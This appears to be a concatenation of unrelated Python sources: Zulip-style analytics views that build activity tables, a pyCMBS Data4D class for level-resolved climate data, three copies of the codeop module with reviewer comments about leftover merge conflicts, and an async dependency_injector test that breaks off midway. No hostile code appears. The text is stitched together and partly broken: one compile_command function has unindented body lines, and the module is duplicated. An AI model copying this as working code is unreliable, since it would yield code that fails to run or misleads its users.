def get_activity(request):
    """Top-level /activity page: realm counts, durations, ad-hoc reports."""
    duration_content, realm_minutes = user_activity_intervals()
    data = [
        ('Counts', realm_summary_table(realm_minutes)),
        ('Durations', duration_content),
    ]
    data.extend((page['title'], page['content']) for page in ad_hoc_queries())

    return render_to_response(
        'analytics/activity.html',
        dict(data=data, title='Activity', is_home=True),
        context_instance=RequestContext(request)
    )
def get_user_activity_records_for_realm(realm, is_bot):
    """UserActivity rows for every active (non-)bot user in *realm*,
    ordered by email and then by most-recent visit."""
    fields = [
        'user_profile__full_name',
        'user_profile__email',
        'query',
        'client__name',
        'count',
        'last_visit',
    ]
    return UserActivity.objects.filter(
        user_profile__realm__domain=realm,
        user_profile__is_active=True,
        user_profile__is_bot=is_bot
    ).order_by(
        "user_profile__email", "-last_visit"
    ).select_related('user_profile', 'client').only(*fields)
def get_user_activity_records_for_email(email):
    """UserActivity rows for one user, most recent first."""
    fields = [
        'user_profile__full_name',
        'query',
        'client__name',
        'count',
        'last_visit'
    ]
    return UserActivity.objects.filter(
        user_profile__email=email
    ).order_by(
        "-last_visit"
    ).select_related('user_profile', 'client').only(*fields)
def raw_user_activity_table(records):
    """Render the raw UserActivity rows for one user as a table."""
    cols = [
        'query',
        'client',
        'count',
        'last_visit'
    ]
    rows = [
        [
            record.query,
            record.client.name,
            record.count,
            format_date_for_activity_reports(record.last_visit)
        ]
        for record in records
    ]
    return make_table('Raw Data', cols, rows)
def get_user_activity_summary(records):
    """Aggregate one user's UserActivity rows into an action summary.

    Returns a dict mapping an action name ('use', 'send', 'pointer',
    'website', 'desktop', or a client name) to
    {'count': total hits, 'last_visit': most recent visit}, plus a
    'name' entry holding the user's full name.
    """
    summary = {}
    def update(action, record):
        # Seed the bucket on first sight; afterwards accumulate the count
        # and keep the most recent visit time.
        if action not in summary:
            summary[action] = dict(
                count=record.count,
                last_visit=record.last_visit
            )
        else:
            summary[action]['count'] += record.count
            summary[action]['last_visit'] = max(
                summary[action]['last_visit'],
                record.last_visit
            )
    if records:
        summary['name'] = records[0].user_profile.full_name
    for record in records:
        client = record.client.name
        query = record.query
        update('use', record)
        if client == 'API':
            # Webhook-style API hits are re-attributed to the integration
            # name parsed from the URL path.
            m = re.match('/api/.*/external/(.*)', query)
            if m:
                client = m.group(1)
                update(client, record)
        if client.startswith('desktop'):
            update('desktop', record)
        if client == 'website':
            update('website', record)
        if ('send_message' in query) or re.search('/api/.*/external/.*', query):
            update('send', record)
        if query in ['/json/update_pointer', '/api/v1/update_pointer']:
            update('pointer', record)
        # NOTE(review): for API-external requests, update(client, ...) was
        # already called above after the rename, so those records appear to
        # be counted twice under the integration name -- confirm intended.
        update(client, record)
    return summary
def format_date_for_activity_reports(date):
    """Format an aware datetime in US/Eastern; '' for a missing date."""
    if not date:
        return ''
    return date.astimezone(eastern_tz).strftime('%Y-%m-%d %H:%M')
def user_activity_link(email):
    """HTML anchor linking to the per-user activity page for *email*."""
    url = urlresolvers.reverse('analytics.views.get_user_activity',
                               kwargs=dict(email=email))
    return mark_safe('<a href="%s">%s</a>' % (url, email))
def realm_activity_link(realm):
    """HTML anchor linking to the per-realm activity page for *realm*."""
    url = urlresolvers.reverse('analytics.views.get_realm_activity',
                               kwargs=dict(realm=realm))
    return mark_safe('<a href="%s">%s</a>' % (url, realm))
def realm_client_table(user_summaries):
    """Flatten per-user client summaries into a single 'Clients' table.

    user_summaries: dict of email -> summary dict from
    get_user_activity_summary().
    """
    # Keys that are aggregate actions (or metadata) rather than clients.
    exclude_keys = [
        'internal',
        'name',
        'use',
        'send',
        'pointer',
        'website',
        'desktop',
    ]
    rows = []
    for email, user_summary in user_summaries.items():
        email_link = user_activity_link(email)
        name = user_summary['name']
        for client, stats in user_summary.items():
            if client in exclude_keys:
                continue
            rows.append([
                format_date_for_activity_reports(stats['last_visit']),
                client,
                name,
                email_link,
                stats['count'],
            ])

    # Formatted dates sort lexicographically == chronologically.
    rows.sort(key=lambda r: r[0], reverse=True)

    cols = [
        'Last visit',
        'Client',
        'Name',
        'Email',
        'Count',
    ]
    return make_table('Clients', cols, rows)
def user_activity_summary_table(user_summary):
    """Render one user's per-client activity summary as a table."""
    rows = []
    for client, stats in user_summary.items():
        if client == 'name':
            # 'name' holds the user's full name, not activity stats.
            continue
        rows.append([
            format_date_for_activity_reports(stats['last_visit']),
            client,
            stats['count'],
        ])
    rows.sort(key=lambda r: r[0], reverse=True)

    cols = [
        'last_visit',
        'client',
        'count',
    ]
    return make_table('User Activity', cols, rows)
def realm_user_summary_table(all_records, admin_emails):
    """Build the per-user 'Summary' table for one realm.

    all_records: UserActivity rows already ordered by user email, as
                 required by itertools.groupby below.
    admin_emails: set of emails whose rows get the 'admin' CSS class.
    Returns (user_records, html_content).
    """
    user_records = {}
    def by_email(record):
        return record.user_profile.email
    for email, records in itertools.groupby(all_records, by_email):
        user_records[email] = get_user_activity_summary(list(records))
    def get_last_visit(user_summary, k):
        if k in user_summary:
            return user_summary[k]['last_visit']
        else:
            return None
    def get_count(user_summary, k):
        if k in user_summary:
            return user_summary[k]['count']
        else:
            return ''
    def is_recent(val):
        # "Recent" = within the last five minutes.
        age = datetime.now(val.tzinfo) - val
        return age.total_seconds() < 5 * 60
    rows = []
    for email, user_summary in user_records.items():
        email_link = user_activity_link(email)
        sent_count = get_count(user_summary, 'send')
        cells = [user_summary['name'], email_link, sent_count]
        row_class = ''
        for field in ['use', 'send', 'pointer', 'desktop', 'ZulipiOS', 'Android']:
            val = get_last_visit(user_summary, field)
            if field == 'use':
                if val and is_recent(val):
                    row_class += ' recently_active'
                if email in admin_emails:
                    row_class += ' admin'
            val = format_date_for_activity_reports(val)
            cells.append(val)
        row = dict(cells=cells, row_class=row_class)
        rows.append(row)
    def by_used_time(row):
        # cells[3] is the formatted 'use' timestamp ('YYYY-MM-DD HH:MM' or
        # ''), so a lexicographic sort is also a chronological sort.
        return row['cells'][3]
    rows = sorted(rows, key=by_used_time, reverse=True)
    cols = [
        'Name',
        'Email',
        'Total sent',
        'Heard from',
        'Message sent',
        'Pointer motion',
        'Desktop',
        'ZulipiOS',
        'Android'
    ]
    title = 'Summary'
    content = make_table(title, cols, rows, has_row_class=True)
    return user_records, content
@zulip_internal
def get_realm_activity(request, realm):
    """Per-realm activity drill-down page: human/bot summaries, client
    usage, and two weeks of message history."""
    data = []
    all_records = {}
    all_user_records = {}
    try:
        admins = get_realm(realm).get_admin_users()
    except Realm.DoesNotExist:
        return HttpResponseNotFound("Realm %s does not exist" % (realm,))
    admin_emails = {admin.email for admin in admins}
    for is_bot, page_title in [(False, 'Humans'), (True, 'Bots')]:
        all_records = get_user_activity_records_for_realm(realm, is_bot)
        all_records = list(all_records)
        user_records, content = realm_user_summary_table(all_records, admin_emails)
        all_user_records.update(user_records)
        data += [(page_title, content)]
    page_title = 'Clients'
    content = realm_client_table(all_user_records)
    data += [(page_title, content)]
    page_title = 'History'
    content = sent_messages_report(realm)
    data += [(page_title, content)]
    # Graphite link to the realm's active-user gauge; dots in the domain
    # must become underscores to form a valid metric path.
    fix_name = lambda realm: realm.replace('.', '_')
    realm_link = 'https://stats1.zulip.net:444/render/?from=-7days'
    realm_link += '&target=stats.gauges.staging.users.active.%s.0_16hr' % (fix_name(realm),)
    title = realm
    return render_to_response(
        'analytics/activity.html',
        dict(data=data, realm_link=realm_link, title=title),
        context_instance=RequestContext(request)
    )
@zulip_internal
def get_user_activity(request, email):
    """Per-user activity drill-down page: summary plus raw records."""
    records = get_user_activity_records_for_email(email)

    summary = get_user_activity_summary(records)
    data = [
        ('Summary', user_activity_summary_table(summary)),
        ('Info', raw_user_activity_table(records)),
    ]
    return render_to_response(
        'analytics/activity.html',
        dict(data=data, title=email),
        context_instance=RequestContext(request)
    )
# --- end of analytics views section (stray '| |' concatenation artifact removed) ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Walter Sauf"
__version__ = "0.1.4"
__date__ = "2013/04/16"
__email__ = "walter.sauf@zmaw.de"
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
"""
Data4D CLASS
class to work with the PFTs from JSBACH
The Data4D class has the Data Class as a base class.
In addition to the Class Date has the Data4D class the attributs
from_level : the number of the lowest level, starting by 0
to_level : the number of the highest level
data4D : is an array of the attribude 'data' from the Data-Class
becase all data are stored in the data4D array, the normal data attribude is deleted.
"""
#### from pylab import *
from data import Data
import matplotlib.colors as col
import matplotlib.cm as cm
from matplotlib import pyplot as plt
from cdo import *
class Data4D(Data):
    """Container for level-resolved (4D) data such as JSBACH PFTs.

    Extends Data with:
        levellist : dict mapping level value -> index into data4D
        data4D    : list of per-level data arrays (replaces Data.data)
    """

    #-----------------------------------------------------------------------
    def read(self, shift_lon, start_time=None, stop_time=None, time_var='time', checklat=True):
        """Read the variable level by level into self.data4D.

        If no level list was given to the constructor, the levels are
        queried from the file via CDO.  The inherited self.data attribute
        is removed afterwards; all data live in self.data4D.
        """
        cdo = Cdo()
        if self.levellist == {}:
            # No levels given: ask CDO which levels the file contains.
            L = cdo.showlevel(input='-selname,' +
                              self.varname + ' ' + self.filename)
            levell = L[0].split(' ')
            for index, k in enumerate(levell):
                self.levellist[int(k)] = index
        # Read metadata/coordinates once, using an arbitrary level.
        self.level = int(self.levellist[next(iter(self.levellist))])
        Data.read(self, shift_lon, start_time=start_time,
                  stop_time=stop_time, time_var=time_var, checklat=checklat)
        del self.data
        for k in sorted(self.levellist.keys()):
            self.level = int(self.levellist[int(k)])
            self.data4D.append(Data.read_netcdf(self, self.varname))

    #-----------------------------------------------------------------------
    def _copy_Data4D_Info_to_Data(self):
        """Copy every plain attribute (everything except data4D and
        levellist) onto a fresh Data object.

        Returns
        -------
        Data
        """
        d = Data(None, None)
        for attr, value in self.__dict__.items():
            if attr in ('data4D', 'levellist'):
                continue
            try:
                # copy() where available (needed for arrays) ...
                setattr(d, attr, value.copy())
            except Exception:
                # ... plain reference assignment otherwise.
                setattr(d, attr, value)
        return d

    #-----------------------------------------------------------------------
    def copy(self):
        """Copy the complete Data4D object, including a per-level copy of
        data4D.

        Returns
        -------
        Data4D
        """
        d = Data4D(None, None)
        for attr, value in self.__dict__.items():
            if attr == 'data4D':
                # Handled below, level by level.  (The old exec-based loop
                # re-executed a stale command string in this branch.)
                continue
            try:
                setattr(d, attr, value.copy())
            except Exception:
                setattr(d, attr, value)
        for k in self.levellist.keys():
            d.data4D.append(self.data4D[self.levellist[k]].copy())
        return d

    #-----------------------------------------------------------------------
    def getDataFromLevel(self, l):
        """Return one level of data4D as a Data object.

        Parameters
        ----------
        l : int
            level value; must be a key of self.levellist

        Raises
        ------
        ValueError if *l* is not a known level.
        """
        if int(l) not in self.levellist:
            raise ValueError('Given Level %s not in data4D!' % str(l))
        ret = self._copy_Data4D_Info_to_Data()
        ret.data = self.data4D[self.levellist[int(l)]]
        return ret

    #-----------------------------------------------------------------------
    def setDataFromLevel(self, da, l):
        """Store da.data as level *l* of data4D.

        Parameters
        ----------
        da : Data
            object whose .data array is stored
        l : int
            level value; must be a key of self.levellist

        Raises
        ------
        ValueError if *l* is not a known level.
        """
        if int(l) not in self.levellist:
            raise ValueError('Given Level %s not in data4D!' % str(l))
        self.data4D[self.levellist[int(l)]] = da.data

    #-----------------------------------------------------------------------
    def mulc(self, x, copy=True):
        """Multiply every level by the constant *x*; returns a copy unless
        copy=False (in-place)."""
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            d.data4D[self.levellist[k]] *= x
        return d

    #-----------------------------------------------------------------------
    def mul(self, x, copy=True):
        """Multiply by *x*: level-wise if x is a Data4D, otherwise x.data
        is applied to every level."""
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            if hasattr(x, 'data4D'):
                d.data4D[self.levellist[k]] *= x.data4D[self.levellist[k]]
            else:
                d.data4D[self.levellist[k]] *= x.data
        return d

    #-----------------------------------------------------------------------
    def divc(self, x, copy=True):
        """Divide every level by the constant *x*."""
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            d.data4D[self.levellist[k]] /= x
        return d

    #-----------------------------------------------------------------------
    def div(self, x, copy=True):
        """Divide by *x*: level-wise if x is a Data4D, otherwise x.data is
        applied to every level."""
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            if hasattr(x, 'data4D'):
                d.data4D[self.levellist[k]] /= x.data4D[self.levellist[k]]
            else:
                d.data4D[self.levellist[k]] /= x.data
        return d

    #-----------------------------------------------------------------------
    def addc(self, x, copy=True):
        """Add the constant *x* to every level."""
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            d.data4D[self.levellist[k]] += x
        return d

    #-----------------------------------------------------------------------
    def add(self, x, copy=True):
        """Add *x*: level-wise if x is a Data4D, otherwise x.data is added
        to every level.

        NOTE: a leftover debug assignment (d.label = "myLabel") that
        clobbered the label of the result was removed here.
        """
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            if hasattr(x, 'data4D'):
                d.data4D[self.levellist[k]] += x.data4D[self.levellist[k]]
            else:
                d.data4D[self.levellist[k]] += x.data
        return d

    #-----------------------------------------------------------------------
    def subc(self, x, copy=True):
        """Subtract the constant *x* from every level."""
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            d.data4D[self.levellist[k]] -= x
        return d

    #-----------------------------------------------------------------------
    def sub(self, x, copy=True):
        """Subtract *x*: level-wise if x is a Data4D, otherwise x.data is
        subtracted from every level."""
        d = self.copy() if copy else self
        for k in self.levellist.keys():
            if hasattr(x, 'data4D'):
                d.data4D[self.levellist[k]] -= x.data4D[self.levellist[k]]
            else:
                d.data4D[self.levellist[k]] -= x.data
        return d

    #-----------------------------------------------------------------------
    def sum_data4D(self):
        """Sum all levels into a single Data object.

        Returns
        -------
        Data
        """
        total = self._copy_Data4D_Info_to_Data()
        total.data = 0.0
        for k in self.levellist.keys():
            total.data += self.data4D[self.levellist[k]]
        return total

    #-------------------------------------------------------------------------
    def __init__(self, filename, varname, levellist=None, **kwargs):
        """Data4D constructor.

        Parameters
        ----------
        filename : str
            netCDF file to read
        varname : str
            variable name within the file
        levellist : iterable of level values, optional
            levels to load; if omitted, levels are detected in read()
        """
        self.levellist = {}
        if levellist is not None:
            for index, k in enumerate(levellist):
                self.levellist[int(k)] = index
        self.data4D = []
        Data.__init__(self, filename, varname, **kwargs)
        # Apply the scale factor determined by Data.__init__ to every level.
        self.mulc(self.scale_factor, copy=False)
# --- end of Data4D section (stray '| |' concatenation artifact removed) ---
# FIXME(review): unresolved merge conflict -- two '<<<<<<< HEAD' markers
# began here.  Both sides of the conflict are identical copies of this
# codeop module; the duplicate after the '=======' separator below should
# be deleted when the conflict is resolved.
r"""Utilities to compile possibly incomplete Python source code.
This module provides two interfaces, broadly similar to the builtin
function compile(), which take program text, a filename and a 'mode'
and:
- Return code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
Approach:
First, check if the source consists entirely of blank lines and
comments; if so, replace it with 'pass', because the built-in
parser doesn't always do the right thing for these.
Compile three times: as is, with \n, and with \n\n appended. If it
compiles as is, it's complete. If it compiles with one \n appended,
we expect more. If it doesn't compile either way, we compare the
error we get when compiling with \n or \n\n appended. If the errors
are the same, the code is broken. But if the errors are different, we
expect more. Not intuitive; not even guaranteed to hold in future
releases; but this matches the compiler's behavior from Python 1.4
through 2.2, at least.
Caveat:
It is possible (but not likely) that the parser stops parsing with a
successful outcome before reaching the end of the source; in this
case, trailing symbols may be ignored instead of causing an error.
For example, a backslash followed by two newlines may be followed by
arbitrary garbage. This will be fixed once the API for the parser is
better.
The two interfaces are:
compile_command(source, filename, symbol):
Compiles a single command in the manner described above.
CommandCompiler():
Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force.
The module also provides another class:
Compile():
Instances of this class act like the built-in function compile,
but with 'memory' in the sense described above.
"""
import __future__

# All __future__ feature objects, so Compile can detect which compiler
# flags a compiled code object turned on.
_features = [getattr(__future__, fname)
             for fname in __future__.all_feature_names]

__all__ = ["compile_command", "Compile", "CommandCompiler"]

PyCF_DONT_IMPLY_DEDENT = 0x200          # Matches pythonrun.h
def _maybe_compile(compiler, source, filename, symbol):
    """Compile *source* as-is, with "\\n", and with "\\n\\n" appended, and
    classify it: return a code object if complete, None if incomplete,
    re-raise the SyntaxError if genuinely broken.
    """
    # Check for source consisting of only blank lines and comments
    for line in source.split("\n"):
        line = line.strip()
        if line and line[0] != '#':
            break              # Leave it alone
    else:
        if symbol != "eval":
            source = "pass"            # Replace it with a 'pass' statement
    err = err1 = err2 = None
    code = code1 = code2 = None

    try:
        code = compiler(source, filename, symbol)
    except SyntaxError as err:
        # NOTE(review): on Python 3 the 'as err' binding is unbound again
        # when this clause exits (PEP 3110); err is never read afterwards,
        # so this only works because the value is unused.
        pass

    try:
        code1 = compiler(source + "\n", filename, symbol)
    except SyntaxError as e:
        err1 = e

    try:
        code2 = compiler(source + "\n\n", filename, symbol)
    except SyntaxError as e:
        err2 = e

    if code:
        # Compiles as-is: the command is complete.
        return code
    # If appending more newlines does not change the error, the input is
    # genuinely broken; otherwise fall through (return None = incomplete).
    if not code1 and repr(err1) == repr(err2):
        raise err1
def _compile(source, filename, symbol):
    """Compile with dedent-implication disabled (codeop semantics)."""
    flags = PyCF_DONT_IMPLY_DEDENT
    return compile(source, filename, symbol, flags)
def compile_command(source, filename="<input>", symbol="single"):
r"""Compile a command and determine whether it is incomplete.
Arguments:
source -- the source string; may contain \n characters
filename -- optional filename from which source was read; default
"<input>"
symbol -- optional grammar start symbol; "single" (default) or "eval"
Return value / exceptions raised:
- Return a code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
"""
return _maybe_compile(_compile, source, filename, symbol)
class Compile:
    """A compile()-like callable with __future__ 'memory': once a compiled
    text enables a future feature, all later compilations keep it on."""

    def __init__(self):
        self.flags = PyCF_DONT_IMPLY_DEDENT

    def __call__(self, source, filename, symbol):
        code_obj = compile(source, filename, symbol, self.flags, 1)
        # Remember any __future__ feature the compiled code switched on.
        new_flags = self.flags
        for feature in _features:
            if code_obj.co_flags & feature.compiler_flag:
                new_flags |= feature.compiler_flag
        self.flags = new_flags
        return code_obj
class CommandCompiler:
    """Callable with the same signature as compile_command(), but which
    remembers __future__ statements from earlier inputs and applies them
    to all later ones (via an internal Compile instance)."""

    def __init__(self,):
        self.compiler = Compile()

    def __call__(self, source, filename="<input>", symbol="single"):
        r"""Compile *source*, detecting incomplete commands.

        Arguments:

        source -- source string, possibly containing \n characters
        filename -- filename reported in tracebacks; default "<input>"
        symbol -- grammar start symbol: "single" (default) or "eval"

        Returns a code object when the command is complete and valid, or
        None when it is incomplete.  Raises SyntaxError, ValueError or
        OverflowError when the command is a syntax error (ValueError and
        OverflowError can come from malformed literals).
        """
        return _maybe_compile(self.compiler, source, filename, symbol)
# FIXME(review): '=======' merge-conflict separator was here.  Everything
# below this point is a duplicate copy of the module above and should be
# removed when the conflict is resolved.
r"""Utilities to compile possibly incomplete Python source code.
This module provides two interfaces, broadly similar to the builtin
function compile(), which take program text, a filename and a 'mode'
and:
- Return code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
Approach:
First, check if the source consists entirely of blank lines and
comments; if so, replace it with 'pass', because the built-in
parser doesn't always do the right thing for these.
Compile three times: as is, with \n, and with \n\n appended. If it
compiles as is, it's complete. If it compiles with one \n appended,
we expect more. If it doesn't compile either way, we compare the
error we get when compiling with \n or \n\n appended. If the errors
are the same, the code is broken. But if the errors are different, we
expect more. Not intuitive; not even guaranteed to hold in future
releases; but this matches the compiler's behavior from Python 1.4
through 2.2, at least.
Caveat:
It is possible (but not likely) that the parser stops parsing with a
successful outcome before reaching the end of the source; in this
case, trailing symbols may be ignored instead of causing an error.
For example, a backslash followed by two newlines may be followed by
arbitrary garbage. This will be fixed once the API for the parser is
better.
The two interfaces are:
compile_command(source, filename, symbol):
Compiles a single command in the manner described above.
CommandCompiler():
Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force.
The module also provides another class:
Compile():
Instances of this class act like the built-in function compile,
but with 'memory' in the sense described above.
"""
import __future__
_features = [getattr(__future__, fname)
for fname in __future__.all_feature_names]
__all__ = ["compile_command", "Compile", "CommandCompiler"]
PyCF_DONT_IMPLY_DEDENT = 0x200 # Matches pythonrun.h
# Duplicate copy of _maybe_compile from the second side of the unresolved
# merge conflict; kept byte-identical pending conflict resolution.
def _maybe_compile(compiler, source, filename, symbol):
    """Compile *source* as-is, with "\\n", and with "\\n\\n" appended, and
    classify it as complete (code object), incomplete (None), or broken
    (re-raise the SyntaxError)."""
    # Check for source consisting of only blank lines and comments
    for line in source.split("\n"):
        line = line.strip()
        if line and line[0] != '#':
            break              # Leave it alone
    else:
        if symbol != "eval":
            source = "pass"            # Replace it with a 'pass' statement
    err = err1 = err2 = None
    code = code1 = code2 = None
    try:
        code = compiler(source, filename, symbol)
    except SyntaxError as err:
        pass
    try:
        code1 = compiler(source + "\n", filename, symbol)
    except SyntaxError as e:
        err1 = e
    try:
        code2 = compiler(source + "\n\n", filename, symbol)
    except SyntaxError as e:
        err2 = e
    if code:
        return code
    if not code1 and repr(err1) == repr(err2):
        raise err1
# Duplicate copy of _compile (merge-conflict second side).
def _compile(source, filename, symbol):
    # Compile with dedent-implication disabled (codeop semantics).
    return compile(source, filename, symbol, PyCF_DONT_IMPLY_DEDENT)
def compile_command(source, filename="<input>", symbol="single"):
    r"""Compile a command and determine whether it is incomplete.

    Arguments:

    source -- the source string; may contain \n characters
    filename -- optional filename from which source was read; default
                "<input>"
    symbol -- optional grammar start symbol; "single" (default) or "eval"

    Return value / exceptions raised:

    - Return a code object if the command is complete and valid
    - Return None if the command is incomplete
    - Raise SyntaxError, ValueError or OverflowError if the command is a
      syntax error (OverflowError and ValueError can be produced by
      malformed literals).
    """
    return _maybe_compile(_compile, source, filename, symbol)
class Compile:
    """A compile() work-alike with __future__ 'memory'.

    Once an instance compiles text containing a __future__ statement, the
    matching compiler flag stays in force for every subsequent call.
    """

    def __init__(self):
        # Start with interactive-mode compilation only.
        self.flags = PyCF_DONT_IMPLY_DEDENT

    def __call__(self, source, filename, symbol):
        code_object = compile(source, filename, symbol, self.flags, 1)
        # Accumulate any future-feature flags the compiled code turned on.
        for feature in _features:
            if code_object.co_flags & feature.compiler_flag:
                self.flags |= feature.compiler_flag
        return code_object
class CommandCompiler:
    """compile_command() as a stateful callable.

    Instances have __call__ methods identical in signature to
    compile_command(); the difference is that a __future__ statement seen
    in one call stays in force for all later calls on the same instance.
    """

    def __init__(self):
        self.compiler = Compile()

    def __call__(self, source, filename="<input>", symbol="single"):
        r"""Compile a command and determine whether it is incomplete.

        Arguments:

        source -- the source string; may contain \n characters
        filename -- optional filename from which source was read;
                    default "<input>"
        symbol -- optional grammar start symbol; "single" (default) or
                  "eval"

        Return value / exceptions raised:

        - Return a code object if the command is complete and valid
        - Return None if the command is incomplete
        - Raise SyntaxError, ValueError or OverflowError if the command is a
          syntax error (OverflowError and ValueError can be produced by
          malformed literals).
        """
        return _maybe_compile(self.compiler, source, filename, symbol)
# NOTE(review): unresolved git merge-conflict markers were left here:
#     >>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
#     =======
# They make the file syntactically invalid and introduce a duplicate copy of
# the codeop module below; resolve the conflict and keep a single copy.
r"""Utilities to compile possibly incomplete Python source code.
This module provides two interfaces, broadly similar to the builtin
function compile(), which take program text, a filename and a 'mode'
and:
- Return code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
Approach:
First, check if the source consists entirely of blank lines and
comments; if so, replace it with 'pass', because the built-in
parser doesn't always do the right thing for these.
Compile three times: as is, with \n, and with \n\n appended. If it
compiles as is, it's complete. If it compiles with one \n appended,
we expect more. If it doesn't compile either way, we compare the
error we get when compiling with \n or \n\n appended. If the errors
are the same, the code is broken. But if the errors are different, we
expect more. Not intuitive; not even guaranteed to hold in future
releases; but this matches the compiler's behavior from Python 1.4
through 2.2, at least.
Caveat:
It is possible (but not likely) that the parser stops parsing with a
successful outcome before reaching the end of the source; in this
case, trailing symbols may be ignored instead of causing an error.
For example, a backslash followed by two newlines may be followed by
arbitrary garbage. This will be fixed once the API for the parser is
better.
The two interfaces are:
compile_command(source, filename, symbol):
Compiles a single command in the manner described above.
CommandCompiler():
Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force.
The module also provides another class:
Compile():
Instances of this class act like the built-in function compile,
but with 'memory' in the sense described above.
"""
import __future__

# All feature objects exported by __future__; Compile scans these to detect
# which future-feature flags a compiled code object activated.
_features = [getattr(__future__, fname)
             for fname in __future__.all_feature_names]

__all__ = ["compile_command", "Compile", "CommandCompiler"]

# Compiler flag: do not require the trailing NEWLINE/DEDENT of a complete
# statement (interactive mode).  Value must match pythonrun.h.
PyCF_DONT_IMPLY_DEDENT = 0x200          # Matches pythonrun.h
def _maybe_compile(compiler, source, filename, symbol):
    """Compile *source* with *compiler*, deciding complete vs. incomplete.

    Returns a code object if complete, None if incomplete, and re-raises
    the SyntaxError when the source is genuinely broken (see the module
    docstring for the triple-compile heuristic).
    """
    # Check for source consisting of only blank lines and comments.
    for line in source.split("\n"):
        line = line.strip()
        if line and line[0] != '#':
            break               # Leave it alone.
    else:
        if symbol != "eval":
            source = "pass"     # Replace it with a 'pass' statement.

    err = err1 = err2 = None
    code = code1 = code2 = None

    # Compile three variants: as-is, with "\n" appended, with "\n\n" appended.
    try:
        code = compiler(source, filename, symbol)
    except SyntaxError as err:
        # NOTE(review): 'err' is unbound again once this except block exits
        # (Python 3 semantics); only err1/err2 are compared below.
        pass

    try:
        code1 = compiler(source + "\n", filename, symbol)
    except SyntaxError as e:
        err1 = e

    try:
        code2 = compiler(source + "\n\n", filename, symbol)
    except SyntaxError as e:
        err2 = e

    if code:
        # Compiled as-is: the command is complete and valid.
        return code
    if not code1 and repr(err1) == repr(err2):
        # Appending newlines produced the same error: the code is broken.
        raise err1
    # Otherwise fall through, returning None: the command is incomplete.
def _compile(source, filename, symbol):
    """Compile *source* in interactive mode (no implied trailing DEDENT)."""
    interactive_flags = PyCF_DONT_IMPLY_DEDENT
    return compile(source, filename, symbol, interactive_flags)
def compile_command(source, filename="<input>", symbol="single"):
    r"""Compile a command and determine whether it is incomplete.

    Arguments:

    source -- the source string; may contain \n characters
    filename -- optional filename from which source was read; default
                "<input>"
    symbol -- optional grammar start symbol; "single" (default) or "eval"

    Return value / exceptions raised:

    - Return a code object if the command is complete and valid
    - Return None if the command is incomplete
    - Raise SyntaxError, ValueError or OverflowError if the command is a
      syntax error (OverflowError and ValueError can be produced by
      malformed literals).
    """
    return _maybe_compile(_compile, source, filename, symbol)
class Compile:
    """A compile() work-alike with __future__ 'memory'.

    Once an instance compiles text containing a __future__ statement, the
    matching compiler flag stays in force for every subsequent call.
    """

    def __init__(self):
        # Start with interactive-mode compilation only.
        self.flags = PyCF_DONT_IMPLY_DEDENT

    def __call__(self, source, filename, symbol):
        code_object = compile(source, filename, symbol, self.flags, 1)
        # Accumulate any future-feature flags the compiled code turned on.
        for feature in _features:
            if code_object.co_flags & feature.compiler_flag:
                self.flags |= feature.compiler_flag
        return code_object
class CommandCompiler:
    """compile_command() as a stateful callable.

    Instances have __call__ methods identical in signature to
    compile_command(); the difference is that a __future__ statement seen
    in one call stays in force for all later calls on the same instance.
    """

    def __init__(self):
        self.compiler = Compile()

    def __call__(self, source, filename="<input>", symbol="single"):
        r"""Compile a command and determine whether it is incomplete.

        Arguments:

        source -- the source string; may contain \n characters
        filename -- optional filename from which source was read;
                    default "<input>"
        symbol -- optional grammar start symbol; "single" (default) or
                  "eval"

        Return value / exceptions raised:

        - Return a code object if the command is complete and valid
        - Return None if the command is incomplete
        - Raise SyntaxError, ValueError or OverflowError if the command is a
          syntax error (OverflowError and ValueError can be produced by
          malformed literals).
        """
        return _maybe_compile(self.compiler, source, filename, symbol)
# NOTE(review): unresolved git merge-conflict marker was left here:
#     >>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
# Resolve the conflict and drop the duplicated codeop copy above.
| |
"""Factory provider async mode tests."""
import asyncio
from dependency_injector import containers, providers
from pytest import mark, raises
from .common import RESOURCE1, RESOURCE2, Client, Service, BaseContainer, Container, init_resource
@mark.asyncio
async def test_args_injection():
    """Positional injections of async resources are awaited and delivered."""
    class ContainerWithArgs(BaseContainer):
        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            BaseContainer.resource2,
        )
        service = providers.Factory(
            Service,
            client,
        )

    container = ContainerWithArgs()

    def _verify_client(candidate):
        assert isinstance(candidate, Client)
        assert candidate.resource1 is RESOURCE1
        assert candidate.resource2 is RESOURCE2

    _verify_client(await container.client())
    _verify_client(await container.client())

    first = await container.service()
    second = await container.service()
    for built in (first, second):
        assert isinstance(built, Service)
        _verify_client(built.client)
    assert first.client is not second.client
@mark.asyncio
async def test_kwargs_injection():
    """Keyword injections inherited from the shared Container work asynchronously."""
    class ContainerWithKwArgs(Container):
        ...

    container = ContainerWithKwArgs()

    def _verify_client(candidate):
        assert isinstance(candidate, Client)
